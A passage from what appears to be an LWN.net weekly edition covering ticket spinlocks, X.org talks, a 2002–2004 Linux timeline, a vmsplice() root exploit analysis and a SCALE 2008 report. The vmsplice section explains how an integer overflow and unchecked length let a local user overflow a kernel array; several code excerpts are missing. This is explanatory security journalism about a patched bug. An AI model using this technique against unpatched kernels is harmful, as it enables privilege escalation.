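    assert(ticket_number(256, 16) == 256);
    /* ... until arrival 65536 wraps around in turn. */
    assert(ticket_number(65536, 16) == 0);
}
```

As long as fewer processors than there are ticket values can be waiting at
once, two waiters never hold the same number.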


With the older spinlock implementation, all processors contending for a
lock fought to see who could grab it first.  Now they wait nicely in line
and grab the lock in the order of arrival.  Multi-thread run times even
out, and maximum latencies are reduced (and, more to the point, made
deterministic).  There is a slight cost to the new implementation, says
Nick, but that gets very small on contemporary processors and is
essentially zero relative to the cost of a cache miss - which is a common
event when dealing with contended locks.  The x86 maintainers clearly
thought that the benefits of eliminating the unseemly scramble for
spinlocks exceeded this small cost; it seems unlikely that others will disagree.

		LCA: Two talks on the state of X


The X window system is the kernel of the desktop Linux experience; if X
does not work well, nothing built on top of it will work well either.  Despite
its crucial role, X suffered from relative neglect for a number of years
before being revitalized by the X.org project.  Two talks at linux.conf.au
covered the current state of the X window system and where we can expect
things to go in the near future.


Keith Packard is a fixture at Linux-related events, so it was no surprise
to see him turn up at LCA.  His talk covered X at a relatively high,
feature-oriented level.  There is a lot going on with X, to say the least. 
Keith started, though, with the announcement that Intel had released
complete documentation for some of its video chips - a welcome move, beyond
any doubt.


There are a lot of things that X.org is shooting for in the near future.
The desktop should be fully composited, allowing software layers to provide
all sorts of interesting effects.  There should be no tearing (the
briefly inconsistent windows which result from partial updates).  We need
integrated 2D and 3D graphics - a goal which is complicated by the fact
that the 2D and 3D APIs do not talk to each other.  A flicker-free boot
(where the X server starts early and never restarts) is on most
distributors' wishlist.  Other desired features include fast and secure
user switching, "hotplug everywhere," reduced power consumption, and a
reduction in the (massive) amount of code which runs with root privileges.


So where do things stand now?  2D graphics and textured video work well.
Overlaid video (where video data is sent directly to the frame 
buffer - a performance technique used by some video playback applications)
does not work with compositing, though.  3D graphics does not always work
that well either; Keith put up the classic example of glxgears running
while the window manager is doing the "desktops on a cube" routine - the 3D
application runs outside of the normal composite mechanism and so cannot be
rotated with all the other windows.


On the tearing front, only 3D graphics supports no-tearing operations now.
Avoiding tearing is really just a matter of waiting for the video retrace
before making changes, but the 2D API lacks support for that.


The integration of APIs is an area requiring some work still.  One problem
is that Xv (video) output cannot be drawn offscreen - again, a problem for
compositing.  Some applications still use overlays, which really just have
no place on the contemporary desktop.  It is impossible to do 3D graphics
to or from pixmaps, which defeats any attempt to pass graphical data
between the 2D and 3D APIs.  On the other side, 2D operations do not
support textures.


Fast user switching can involve switching between virtual terminals, which
is "painful."  Only one user session can be running 3D graphics at a time,
which is a big limitation.  On the hotplug front, there are some
limitations on how the framebuffer is handled.  In particular, the X server
cannot resize the framebuffer, and it can only associate one framebuffer
with the graphics processor.  Some GPUs have maximum line widths, so the
one-framebuffer issue limits the maximum size of the internal desktop.


With regard to power usage: Keith noted that using framebuffer compression
in the Intel driver saves 1/2 watt of power.  But there are a number of
things to be fixed yet.  2D graphics busy-waits on the GPU, meaning that a
graphics-intensive program can peg the system's CPU, even though the GPU is
doing all of the real work.  But the GPU could be doing more as well; for
example, video playback does most of the decoding, rescaling, and color
conversion in the CPU.  But contemporary graphics processors can do all of
that work - they can, for example, take the bit stream directly from a DVD
and display it.  The GPU requires less power than the CPU, so shifting that
work over would be good for power consumption as well as system
responsiveness.


Having summarized the state of the art, Keith turned his attention to the
future.  There is quite a bit of work being done in a number of areas - and
not being done in others - which leads toward a better X for everybody.  On
the 3D compositing front, what's needed is to eliminate the "shared back
buffers" used for 3D rendering so that the rendered output can be handled
like any other graphical data.

Eliminating tearing requires providing the ability to synchronize with the
vertical retrace operation in the graphics card.  The core mechanism to do
this is already there in the form of the X Sync extension.  But, says
Keith, nobody is working on bringing all of this together at the moment.
Getting rid of boot-time flickering, instead, is a matter of getting the X
server properly set up sufficiently early in the process.  That's mostly a
distributor's job.


To further integrate APIs, one thing which must be done is to get rid of
overlays and to allow all graphical operations (including Xv operations) to
draw into pixmaps.  There is a need for some 3D extensions to create a
channel between GLX and pixmaps.


Supporting fast user switching means adding the ability to work with
multiple DRM masters.  Framebuffer resizing, instead, means moving
completely over to the EXA acceleration architecture and finishing the
transition to the TTM memory
manager.  In the process, it may become necessary to break all existing
DRI applications, unfortunately.  And multiple framebuffer support is the
objective of a project called "shatter," which will allow screens to be
split across framebuffers.


Improving the power consumption means getting rid of the busy-waiting with
2D graphics (Keith says the answer is simple: "block").  The XvMC protocol
should be extended beyond MPEG; in particular, it needs work to be able to
properly support HDTV.  All of this stuff is currently happening.


Finally, on the security issue, Keith noted the ongoing work to move
graphical mode setting into the kernel.  That will eliminate the need for
the server to directly access the hardware - at least, when DRM-based 2D
graphics are being done.  In that case, it will become possible to run the
X server as "nobody," eliminating all privilege.  There are few people who
would argue against the idea of taking root privileges away from a massive
program like the X server.


In a separate talk, Dave Airlie covered the state of Linux graphics at a
lower level - support for graphics adapters.  He, too, talked about moving
graphical mode setting into the kernel, bringing an end to a longstanding
"legacy issue" and turning the X server into just a rendering system.  That
will reduce security problems and help with other nagging issues (graphical
boot, suspend and resume) as well.


Mode setting is the biggest area of work at the moment.  Beyond that, the
graphics developers are working on getting TTM into the kernel; this will
give them a much better handle on what is happening with graphics memory.
Then, graphics drivers are slowly being reworked around the Gallium3D
architecture.  This will improve and simplify these drivers significantly, but "it's
going to be a while" before this work is ready.  The upcoming DRI2 work will improve buffering and
fix the "glxgears on a cube" problem.


Moving on to graphics adapters: AMD/ATI has, of course, begun the process
of releasing documentation for its hardware.  This happened in an
interesting way, though: AMD went to SUSE in order to get a driver
developed ahead of the documentation release; the result was the "radeonhd"
driver.  Meanwhile, the Avivo project, which had been reverse-engineering
ATI cards, had made significant progress toward a working driver.  Dave
took that work and the AMD documentation to create the
improved "radeon" driver.  So now there are two competing projects writing
drivers for ATI adapters.  Dave noted that code is moving in both
directions, though, so it is not a complete duplication of work.  (As an
aside, from what your editor has heard, most observers expect the radeon
driver to win out in the end).


The ATI R500 architecture is a logical addition to the earlier (supported)
chipsets, so R500 support will come relatively quickly.  R600, instead, is
a totally new processor, so R600 owners will be "in for a wait" before a
working driver is available.


Intel has, says Dave, implemented the "perfect solution": it develops free
drivers for its own hardware.  These drivers are generally well done and
well documented.  Intel is "doing it right."


NVIDIA, of course, is not doing it right.  The Nouveau driver is coming
along, now, with 5-6 developers working on it.  Dave had an RandR
implementation in a state of half-completion for some time; he finally
decided that he would not be able to push it forward and merged it into the
mainline repository.  Since then, others have run with it and RandR support
is moving forward quickly.  It was, he says, a classic example of why it is
good to get the code out there early, whether or not it is "ready."
Performance is starting to get good, to the point that NVIDIA suddenly
added some new acceleration improvements to its binary-only driver.
Dave is still hoping that NVIDIA might yet release some documents - if it
happens by next year, he says, he'll stand in front of the room and dance a
jig.

		Ten-year timeline part 5: Not just SCO


Part 4 of this retrospective
ended in October, 2002, when LWN adopted its current subscription model.
That change brought a certain amount of stability for LWN (too much, we
might argue), but, in the wider Linux world, things continued to happen.
This installment picks up where the last left off.

During this period, the business of Linux was relatively quiet - not that
many acquisitions, but not many failures either.  But quite a bit was
happening around legal issues, copyright enforcement, and more...


 October 10, 2002:
     BitKeeper flames return as the non-compete clause in its license comes
     to light.  
     The sendmail source distribution is trojaned.


BitKeeper flames were a more-or-less constant feature in those days, but BitKeeper
became an established part of the kernel development process anyway.
In the October 10, 2002 edition, your editor wrote: "If Larry
McVoy (or his board of directors) wakes up hung over one morning and
decides to end free access to BitKeeper, the show is over."   That
was, unfortunately, an example of your editor's crystal ball working rather
better than usual.

The trojaning of sendmail was the first of a few such incidents.  It looked
like a scary trend for a while, but, in fact, the frequency of this kind of
attack has dropped quite a bit in the intervening years.


 October 31, 2002: the
     first cryptographic code is finally merged into the Linux kernel.  The
     first Reiser4 snapshot is posted.

 December 19, 2002: The
     Creative Commons project is launched.  ElcomSoft (Dmitry Sklyarov's
     employer) is acquitted of DMCA violation charges.  Kernel developers
     start to complain that the 2.5 feature freeze is thawing.

 January 16, 2003: The
     U.S. Supreme Court decides in favor of unlimited copyright term
     extensions.  MandrakeSoft enters bankruptcy.  The SCO Group starts
     making noises about its "Unix IP."

 January 30, 2003: SCO
     forms SCOSource and makes rather more dire noises about Linux.


By this point, there was a certain amount of discomfort over the direction
SCO was taking.  But nobody had any clue of just how weird it would
actually get.


 February 6, 2003: The
     MS-SQL worm infects the net - in about 15 minutes.  LWN begins its
     "porting drivers to 2.6" series.


Remember the days of disruptive worms?  MS-SQL was one of the scariest, in
that it did most of its propagation in just a few minutes.  We don't see too
many worms like that anymore; contemporary crackers prefer to turn systems
into zombies and rent them out.


 March 13, 2003: The SCO
     Group files a $1 billion lawsuit against IBM.


And so it began, with SCO telling the world that the Linux community could
not possibly have achieved what it did unless the work had been stolen by
IBM.

For the remainder of this retrospective, your editor will attempt to keep
the number of SCO-related entries to a minimum.  It has been quite an
experience to go back and reread all of those
McBride/Enderle/Boies/DiDio/Lyons/etc. quotes, and it is tempting to put
them all here.  But that temptation will be resisted; those who want to
relive that bit of bizarre history in more detail can read the LWN pages
directly or dig through the considerable resources at Groklaw.

SCO is about as scary as Y2K now, but, in 2003, the SCO suit was a
frightening event.  To many of us it seemed possible that, maybe, one out
of thousands of developers might have slipped something improper into the
kernel code base.  And, in any case, we were under attack by a company with
millions of dollars to burn and a loud-mouthed CEO.  The whole thing cost
us a lot of time and anxiety and, for those most directly involved,
money.

Nonetheless, your editor will reiterate his claim that, overall, the SCO
attack has been good for us.  We needed to improve our legal defenses; as
Linux grew, there could be no doubt that people would attempt to use the
legal system to grab a piece of the pie.  In SCO we had an arrogant assailant
with no substance; we were attacked by a clown.  We got the ability to
straighten up our processes, arrange better legal help, and prove that our
code is clean without the inconvenience of facing a complaint with a bit of
legitimacy.  The community is now close to immune from copyright-based
attack, and is much better poised to deal with similar attackers (patent
trolls, for example) who could still do us some serious damage.


 March 27, 2003: Keith
     Packard is kicked out of the XFree86 core team.  Red Hat Linux 9
     - the last Red Hat Linux release - is announced.

 May 15, 2003: SCO
     suspends Linux sales and sends a warning letter to 1500 Linux users.

 May 22, 2003: The GNU and
     Ghostscript projects part ways.  Microsoft buys a $10 million
     Unix license from SCO.

 May 29, 2003: Novell
     claims that it, not SCO, owns Unix.  Kernel developers get upset about
     the fact that there has been no 2.4 kernel release for six months.
     The 2.5 kernel gets a reworked char device layer, IDE tagged command
     queueing support and the USB gadget subsystem - seven months into the 2.5
     feature freeze.  The city of Munich decides to move to Linux.


Novell's claim was clearly significant at the time, though it fell below
the radar again for several months.  In the end, of course, this was the
factor which killed SCO.  That is convenient, but almost unfortunate too:
there would have been value in seeing the substance of SCO's claims
demolished in court.

In these days of fast releases, it is interesting to consider that, for the
first half of 2003, there were no stable kernel releases at all.


 June 19, 2003: Linus
     Torvalds moves to OSDL.  The kernel gets a massively reworked ext3
     filesystem - eight months into the feature freeze.  SCO raises its
     claim for damages to $3 billion and "terminates" IBM's AIX
     license.  Software patents return to the European Parliament.

 July 10, 2003: Andrew
     Morton moves to OSDL.


OSDL was often controversial in the Linux community, but nobody doubted
that providing a home for developers like Linus and Andrew was a good
thing.  Until now, neither had held a job where working on Linux was their
primary duty.

Meanwhile, few suspected how big the software patent battle in Europe would
become - or that the anti-patent side would emerge victorious (for now).


 July 17, 2003: The
     2.6.0-test1 kernel is released; it includes the new anticipatory disk
     I/O scheduler.  Slackware celebrates its 10th anniversary.  The
     Mozilla Foundation is created.

 July 24, 2003: Red Hat
     gets out of the boxed distribution business.  Mozilla starts
     requesting donations from users.


Selling Linux in boxes was how Red Hat got going, so the end of that
business was a clear sign that things had changed.  The separation of
Mozilla and AOL (which had bought Netscape) was a little scary at the time;
it seemed that the project could fade away before the Mozilla browser became
truly ready and that it was an Internet Explorer future for all of us.
Things were a little lean at Mozilla for a while.  Now that Mozilla is
bringing in tens of millions of dollars every year, the idea that it once
sought donations is amusing.


 August 7, 2003: Novell
     acquires Ximian.  Red Hat files suit against SCO.  SCO offers the
     "intellectual property license for Linux."  SELinux is merged for the
     2.6.0-test3 kernel.

 August 21, 2003: SCO
     shows some "copied code."


SCO, remember, "encrypted" its slides of "copied" code by switching them to
a Greek font - a scheme which the community, somehow, managed to overcome.
The code in question was straight from ancient Unix; it had been
contributed by SGI, and had already been removed by the time it was
revealed.  After this, nobody worried that SCO might come up with the
"millions of lines" of code that, it said, it could prove it owned.


 September 25, 2003: The
     Fedora project launches.  Software patents pass in the European
     Parliament.  Sun's Jonathan Schwartz says "We do not believe
     that Linux plays a role on the server. Period." 

 October 16, 2003: Under
     pressure from the FSF and others, LinkSys releases source for its
     WRT54G routers.


Fedora started with all kinds of talk about what a community-oriented
project it would be.  The reality was rather slower in coming, but is
beginning to be visible now.  Meanwhile, Fedora was a useful (and used)
distribution from the outset.

The LinkSys settlement was the result of a long battle.  It was an important
early GPL enforcement action which led to the creation of a number of
distributions created for the sole purpose of doing interesting things on
LinkSys routers.  The ironic result is that LinkSys almost certainly sold
quite a few more units than it would have if it had continued to hold on to
the code.


 October 23, 2003: SCO
     gets $50 million from BayStar.

 November 6, 2003: Novell
     acquires SUSE.  A fight erupts over the "Linux Gazette" name.

 December 24, 2003: SCO
     claims ownership of the Unix ABI.  The 2.6.0 kernel is released.  Red
     Hat acquires Sistina.  The Mozilla Foundation asks for more
     donations.  


2.6.0 took almost exactly three years after 2.4.0 came out.  For the few
developers who had observed the 2.4 feature freezes, their code - which
could be four years old at this point - was only now making it into an
official mainline release.  It was not yet understood at this point, but,
once 2.6.0 came out, the "new kernel development model" started to take
shape.  Never again would we go years between major stable releases.


 January 22, 2004: SCO
     files its "slander of title" suit against Novell.  Linus gets dunked. 

 January 29, 2004:
     UnitedLinux dies a quiet death.  SCO sends a letter to the
     U.S. Congress.  Version 2 of the Apache License is adopted.

 February 5, 2004: XFree86
     leader David Dawes changes the project's license.


There had been trouble in XFree86 for a long time, but the license change
brought it all to a head.  This was the move which killed XFree86, led to
the creation of the revitalized X.org, and, eventually, brought life back
to X development.


 February 12, 2004: The
     Grumpy Editor makes his debut.


The first Grumpy Editor
article was never intended to be the beginning of a series; your editor
was simply grumpy that the Galeon browser had gone the route of many early
GNOME 2.x applications: less configurability, fewer features, and worse
performance.  The persona proved popular with readers, though, and the
Grumpy Editor has been making irregular appearances on LWN ever since.


 February 19, 2004: The
     Netfilter team settles its first GPL enforcement action in Europe.

 February 26, 2004: X11
     development moves to the freedesktop.org project.  MandrakeSoft is
     ordered by a French court to stop using the "Mandrake" name.

 March 4, 2004: SCO sues
     AutoZone and DaimlerChrysler.  EV1Servers.Net buys an expensive SCO
     license - a move they certainly still regret.  FreeS/WAN shuts down. 


The attack on Linux users had been long foreshadowed - and feared.
Regardless of the validity of its claims, SCO could certainly make life
hard for Linux by attacking those who use it.  The attacks were so
laughable, though, that they had no appreciable effect, even in the short
term. 


 March 11, 2004: The
     Anderer memo surfaces, tying SCO to Microsoft.  The tenth anniversary
     of the green card spam.

 March 18, 2004: Open
     Source Risk Management launches.  MandrakeSoft files its plan to exit
     bankruptcy. 


For those who don't remember, OSRM was a scheme to sell insurance against
legal attacks to users of free software.  But, by this point, nobody was
all that worried about SCO, and OSRM never did take off.  On the other
hand, MandrakeSoft did succeed in getting out of bankruptcy and is still
with us.


 March 25, 2004: BitMover
     claims that the pace of kernel development has doubled as a result of
     the adoption of BitKeeper.


This installment started with BitKeeper, and will end there.  For all the
complaints about BitKeeper and its associated "don't piss off Larry"
license, few could contest the claim that kernel development was proceeding
at a much faster pace.  We needed a tool like that.  To this day, it
remains discouraging that we were not able to develop a distributed
revision control system for ourselves until Larry McVoy and BitMover showed
the way.  If there was ever an itch in need of scratching, this was it.

The next installment (which will most likely appear two weeks from now)
will start with April, 2004 and come fairly close to the present.  Stay
tuned.

		vmsplice(): the making of a local root exploit


As this is being written, distributors are working quickly to ship kernel
updates fixing the local root vulnerabilities in the vmsplice()
system call.  Unlike a number of other recent vulnerabilities which have
required special situations (such as the presence of specific hardware) to
exploit, these vulnerabilities are trivially exploited and the code to do
so is circulating on the net.  Your editor found himself wondering how such
a wide hole could find its way into the core kernel code, so he set himself
the task of figuring out just what was going on - a task which took rather
longer than he had expected.


The splice() system call, remember, is a mechanism for creating
data flow plumbing within the kernel.  It can be used to join two file
descriptors; the kernel will then read data from one of those descriptors
and write it to the other in the most efficient way possible.  So one can
write a trivial file copy program which opens the source and destination
files, then splices the two together.  The vmsplice() variant
connects a file descriptor (which must be a pipe) to a region of user
memory; it is in this system call that the problems came to be.
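
As a rough illustration of that kind of copy program, here is a minimal
sketch.  It assumes a Linux system with glibc; the splice_copy() name and
the 64KB chunk size are choices made for this example.  Note that one side
of every splice() call must be a pipe, so the data is staged through one
on its way from the source to the destination.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>

/*
 * Copy everything from in_fd to out_fd using splice().  One end of each
 * splice() call has to be a pipe, so a pipe sits in the middle.
 * Returns the number of bytes copied, or -1 on error.
 * (splice_copy is a hypothetical helper, not a library function.)
 */
ssize_t splice_copy(int in_fd, int out_fd)
{
    int pipefd[2];
    ssize_t total = 0;
    int failed = 0;

    if (pipe(pipefd) < 0)
        return -1;

    while (!failed) {
        /* Source -> pipe, up to 64KB at a time (an arbitrary chunk size). */
        ssize_t n = splice(in_fd, NULL, pipefd[1], NULL, 65536, SPLICE_F_MOVE);
        if (n == 0)
            break;                      /* end of input */
        if (n < 0) {
            failed = 1;
            break;
        }
        /* Pipe -> destination; drain everything that was just queued. */
        while (n > 0) {
            ssize_t w = splice(pipefd[0], NULL, out_fd, NULL,
                               (size_t)n, SPLICE_F_MOVE);
            if (w <= 0) {
                failed = 1;
                break;
            }
            n -= w;
            total += w;
        }
    }

    close(pipefd[0]);
    close(pipefd[1]);
    return failed ? -1 : total;
}
```

A caller would open() the two files, pass the descriptors to
splice_copy(), and close them afterward; the destination should not be
opened with O_APPEND, which splice() refuses.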


The first step in understanding this vulnerability is that, in fact, it is
three separate bugs.  When the word of this problem first came out, it was
thought to only affect 2.6.23 and 2.6.24 kernels.  Changes to the
vmsplice() code had caused the omission of a couple of important
permissions checks.  In particular, if the application had requested that
vmsplice() move the contents of a pipe into a range of memory, the
kernel didn't check whether that application had the right to write to that
memory.  So the exploit could simply write a code snippet of its choice
into a pipe, then ask the kernel to copy it into a piece of kernel memory.
Think of it as a quick-and-easy rootkit installation mechanism.


If the application is, instead, splicing a memory range into a pipe, the
kernel must, first, read in one or more iovec structures
describing that memory range.  The 2.6.23 vmsplice() changes omitted
a check on whether the purported iovec structures were in readable
memory.  This looks more like an information disclosure vulnerability than
anything else - though, as we will see, it can be hard to tell sometimes.


These two vulnerabilities (CVE-2008-0009 and CVE-2008-0010) were patched in
the 2.6.23.15 and 2.6.24.1 kernel updates,
released on February 8.


On February 10, Niki Denev pointed out that
the kernel appeared to be still vulnerable after the fix.  In fact, the
vulnerability was the result of a different problem - and it is a much worse one, in
that kernels all the way back to 2.6.17 are affected.  At this point, a
large proportion of running Linux systems are vulnerable.  This one has
been fixed in the 2.6.22.18,
2.6.23.16, and 2.6.24.2 kernels, also released
on the 10th.  At this point, with luck, all of these bugs have been firmly
stomped - though, now, we need to see a lot of distributor updates.


The problem, once again, is in the memory-to-pipe implementation.  The
function get_iovec_page_array() is charged with finding a set of
struct page pointers corresponding to the array of iovec
structures passed in by the calling application.  Those pointers are stored
in this array:


Where PIPE_BUFFERS happens to be 16.  In order to avoid
overflowing this array, get_iovec_page_array() does the following
check:


Here, off is the offset into the first page of the memory to be
transferred, len is the length passed in by the application, and
buffers is the current index into the pages array.
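
The array and the bounds check just described can be modeled in user space
along the following lines.  This is a sketch reconstructed from the
description above, not a quotation of fs/splice.c: the pages_to_map() name
is hypothetical, and a 4KB page size is assumed.

```c
/* Assumed for illustration: 4KB pages, and the 16-entry limit the text
 * gives for PIPE_BUFFERS. */
#define PAGE_SHIFT   12
#define PAGE_SIZE    (1UL << PAGE_SHIFT)
#define PIPE_BUFFERS 16

struct page;                        /* opaque stand-in for the kernel type */
struct page *pages[PIPE_BUFFERS];   /* fixed-size array of page pointers */

/*
 * Hypothetical helper: how many pages does a request of len bytes,
 * starting off bytes into its first page, span?  The result is limited
 * to the slots still free once `buffers` entries of pages[] are in use.
 */
unsigned long pages_to_map(unsigned long off, unsigned long len,
                           unsigned long buffers)
{
    unsigned long npages = (off + len + PAGE_SIZE - 1) >> PAGE_SHIFT;

    if (npages > PIPE_BUFFERS - buffers)
        npages = PIPE_BUFFERS - buffers;
    return npages;
}
```

For any sane length the clamp does its job: a 100-page request with ten
slots already used is cut down to the six slots that remain.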

Now, if we turn our attention to the exploit code for a
moment, we see it
setting up a number of memory areas with mmap(); some of that
setup is not necessary for the exploit to work, as it turns out.  At the
end, the code does this (edited slightly):


The map_addr address points to one of the areas created with
mmap() which, crucially, is significantly more than
PIPE_BUFFERS pages long.  And the length is passed through as the
largest possible unsigned long value.

Now let's go back to fs/splice.c, where the vmsplice()
implementation lives.  We note that, prior to the fix, the
kernel did not check whether the memory area pointed to by the
iovec structure was readable by the calling process.  Once again,
this looks like an information disclosure vulnerability - the process could
cause any bit of kernel memory to be written to the pipe, from which it
could be read.  But the exploit code is, in fact, passing in a valid
pointer - it's just the length which is clearly absurd.

Looking back at the code which calculates npages, we see
something interesting:


Since len will be ULONG_MAX when the exploit runs, the
addition will cause an integer overflow - with the effect that
npages is calculated to be zero.  Which, one would think, would
cause no pages to be examined at all.  Except that there is an unfortunate
interaction with another part of the kernel.
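
The wraparound is easy to reproduce outside the kernel.  The following
sketch assumes 4KB pages and uses a hypothetical npages_for() helper; it
only models the rounding arithmetic, nothing else in the splice code.

```c
#include <limits.h>

#define PAGE_SHIFT 12                   /* assumed: 4KB pages */
#define PAGE_SIZE  (1UL << PAGE_SHIFT)

/* Round a byte range up to a whole number of pages. */
unsigned long npages_for(unsigned long off, unsigned long len)
{
    /* Unsigned arithmetic silently wraps modulo ULONG_MAX + 1. */
    return (off + len + PAGE_SIZE - 1) >> PAGE_SHIFT;
}
```

With off at zero and len at ULONG_MAX, the sum ULONG_MAX + 4095 wraps
around to 4094, and shifting that right by 12 bits leaves zero, so
npages_for(0, ULONG_MAX) returns 0 on both 32-bit and 64-bit systems.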


Once npages has been calculated, the next line of code looks like
this:


get_user_pages() is the core memory management function used to
pin a set of user-space pages into memory and locate their struct
page pointers.  While the npages variable passed as an
argument is an unsigned quantity, the prototype for
get_user_pages() declares it as a simple int called len.  And, to
complete the evil, this function processes pages in a
do {} while(); loop which ends thusly:


So, if get_user_pages() is called with a len argument of
zero, it will pass through the mapping loop once, decrement len to a
negative number, then continue faulting in pages until it hits an address
which lacks a valid mapping.  At that point it will stop and return.  But,
by then, it may have stored far more entries into the pages array
than the caller had allocated space for.
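
A toy model makes the effect of the signed countdown visible.  The sketch
below is not the kernel's code; it assumes only that the loop has the shape
described above (store a page, advance, decrement len, test at the bottom),
and the slots_filled() name is made up for the example.

```c
#define PAGE_SIZE 4096UL    /* assumed page size */

/*
 * Model of a do {} while () loop which counts down a signed length.
 * `len` is the requested page count; `start` and `vm_end` bound the
 * mapped region.  Returns how many array slots would be written.
 */
unsigned long slots_filled(int len, unsigned long start, unsigned long vm_end)
{
    unsigned long stored = 0;

    do {
        stored++;               /* stands in for pages[i++] = page */
        start += PAGE_SIZE;
        len--;                  /* 0 becomes -1, which still tests true */
    } while (len && start < vm_end);

    return stored;
}
```

Asked for 16 pages of a 48-page region, the model stops after 16.  Asked
for zero, it runs until the end of the region and writes all 48 slots.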

The practical result in this case is that get_user_pages() faults
in (and stores struct page pointers for) the entire region mapped
by the exploit code.  That region (by design) has more than
PIPE_BUFFERS pages - in fact, it has three times that many, so 48
pointers get stored into a 16-pointer array.  And this turns the failure to read-verify
the source array into a buffer overflow vulnerability
within the kernel.  Once that is in place, it is a relatively
straightforward exercise for any suitably 31337 hacker to cause the kernel
to jump into the code of his or her choice.  Game over.  (Update: as
a linux-kernel reader pointed out, the
story is a little more complicated still at this point; this is an unusual
sort of buffer overflow attack).


The fix
which was applied simply checks the address range that the 
application is trying to splice into the pipe.  Since a range of length
ULONG_MAX is unlikely to be valid, the vulnerability is closed -
as are any potential information disclosure problems.

This vulnerability is a clear example of how a seemingly read-only
vulnerability can be escalated into something rather more severe.  It also
shows what can happen when certain types of sloppiness find their way into
the code - if get_user_pages() is asked to get zero pages, that's
how many it should do.  Your editor is working on a patch to clean that up
a bit.  Meanwhile, everybody should ensure that they are running current
kernels with the vulnerability closed.

		A report from SCALE 2008


Escaping the cold for 70 degree days in Los Angeles might be a reason for
some—Colorado-based LWN Editors for example—but it clearly is
not the reason that most folks choose to attend Southern
California Linux Expo (SCALE).  Many of the approximately 1400 attendees already live in the region, so it
is the speakers, participants, and the expo floor that bring them in.  
I attended
the sixth annual
SCALE (SCALE 6x), held February 8-10, and it didn't take me very long to see
why it continues to grow and prosper.


SCALE is a three day event, with two main conference days on Saturday and
Sunday and a set of mini-conferences running in parallel on Friday.  Each
mini-conference covers a focused topic of interest to the community, with
this year's topics examining Women
in Open 
Source (WIOS), Open Source Software in Education (OSSIE), and Demonstrating Open Source
Healthcare Solutions (DOHCS).  It was a full day as each had eight or more
hour-long sessions.


Allison Randal kicked off the WIOS track with a
presentation aimed at encouraging more women to give presentations at
conferences.  Her talk, "The Art of Conference Presentations", was not
particularly gender specific, of course. It covered the process of proposing,
creating and giving talks to conferences.  Randal's advice was cogent,
from avoiding "cute" titles to establishing credibility via your
biography without feeling like you are bragging.  Her most important point was
to not wait around until you are the perfect speaker, but to go out and
start speaking; your voice and style will come with practice.


Over in the OSSIE track, Dan Anderson related his experiences teaching
computer science concepts to middle and high school students over the last
fourteen years.  His approach
is to use computing as a bridge between math, science, and technology.  He
discussed the process of creating, or trying to create, a stable curriculum
in the face of rapid technological change.  Because the hardware, operating
systems, and languages all change quickly, his courses need to focus on
concepts that are not specific to any of those.  Over the years he has
taught, the language used in the advanced placement course—dictated
by the state CollegeBoard company—has gone from Pascal, through C++, and now uses Java,
with some rumblings being heard about moving to Python.  As he points out,
"much of what a High School student learns about technology will be
outdated by the time they graduate from college."


He uses How to Design Programs as the
core text for his courses.  It uses a graphical
programming environment called DrScheme, which is based on Scheme,
that allows different subsets of the language to be used based on the skill
level of the student.  Anderson has integrated various peripherals, like
cameras and audio equipment, into the environment so that students can
interact with the real world in interesting ways.  His students work on
projects like voice authentication and computer vision; this year's project
is to recognize tic-tac-toe as drawn on a white board. 


Other topics from OSSIE included a tutorial introduction to
the moodle content management system (CMS) for
online learning.  Much like other CMS projects, moodle allows the creation
of websites with various kinds of content—audio,
video, images, and text—but organized as a course.  It provides a
framework and philosophy to guide the development of online classes.
Students access the content via the web, completing tasks, taking quizzes,
and participating in forums and chats with other students.

 Charles Edge (no relation) spoke about the challenges of implementing
directory services for educational institutions.  One problem is that the
term "directory services" covers a large amount of ground, from tracking
users (both employees and students) to allowing single sign-on (SSO) into
multiple machines and services throughout the school.  The biggest
challenge can be handling the sheer numbers of people to be tracked.  Open
source solutions do exist: OpenLDAP
for storing the information, Kerberos for single sign-on, and Simple Authentication and Security
Layer (SASL) for extending the reach of the SSO into other services.
They are, however, complex to configure and administer.  For scalability and
robustness in large installations, Edge suggests Microsoft's Active
Directory, which was not a particularly popular opinion with the open
source oriented audience.  

The first day closed with a WIOS panel discussion, where
six of the women presenting or showing at the conference discussed the
issues facing women in open source.  The discussion was informal and
wide-ranging with a great deal of audience participation.  Audience members
asked questions as well as offered opinions and theories on why the
participation of women is low and what can be done to make things better.
No real conclusions were reached, as is usual for discussions of this
topic; the low participation of women remains one of the more puzzling
attributes of the free/open source community.


The animated and amusing Ubuntu community manager Jono Bacon gave a
rousing keynote to start things off on Saturday.  He tried to ensure that
everyone was awake by leading a greeting in multiple languages (including
Klingon).  His main point was to describe the responsibilities of the
various "factions" that jockey to determine the future of open source
software—companies, distributions, and communities—trying to
show that each has an important role.  In fact, it is up to all
constituents to ensure that the greater Linux ecosystem thrives and that
each group works well with the others.  It was all pretty much "motherhood and
apple pie" stuff, but well described and illustrated—all with Chuck
Norris to keep track of the score.  Bacon did provide the quote of the show
when he said that free software was "started by a guy with a beard
who was pissed off at a printer."


Saturday was also the first day that the expo floor was open.  Some 80
booths were there, representing companies large and small as well as lots
of free software projects.  One of the more interesting booths contained a
working simulator of a 747 cockpit.  All of the instruments were driven
from a realtime Linux box and the FlightGear flight simulator was used
to generate the cockpit window view.  The two machines communicated over
the network and various laptops were able to view the flight from other
perspectives by getting updates from the simulator.  It was rather impressive.


 The linuxastronomy.org project
was also on hand with their telescope prototype.  The telescope will be
controlled via a Linux machine allowing it to be pointed at locations as
specified by users.  A Linux desktop application will send locations to the
telescope over the internet, allowing it to be remotely controlled so that
it can be installed in a mountaintop or other location with (relatively)
little light pollution and good viewing conditions. In addition, the
project was demonstrating many of the free astronomy programs available for
Linux.

A mobile audio studio product, Indamixx, did not have a booth, but
could be seen all over the show.  The company loaned two of the UMPC-based
devices to the conference, where they were used to record podcasts of interviews with
speakers and attendees.  The device runs Linux with Audacity and Ardour along with other free software.  The
company has tweaked things to make it all work well and be easy to use on
the device.  It looks to be quite capable as well as easily portable.

In another interesting talk, David Maxwell of Coverity gave an update on their project
to scan free software for security holes.  The US Department of Homeland
Security gave Coverity a grant to work with free software projects to use
the Coverity Prevent static code analysis tool (once known
as the "Stanford Checker") on the code.  The scan project has found over 7,000
defects in around a hundred free software projects since its inception.  Maxwell
is the Open Source Strategist for Coverity; he is looking for more projects
to participate. He is encouraging any free/open source software project to
get in touch with him to get signed up for the program. 

Projects that join get their code scanned
with a report being generated on the Coverity website for project members to
view.  The projects can then fix any of the issues that are actually bugs,
mark others as "not a bug", and resubmit the code.  The Coverity system
will then check the latest code out of the project's source code repository and scan it
again.  Once all issues that the tool finds are handled, the project can
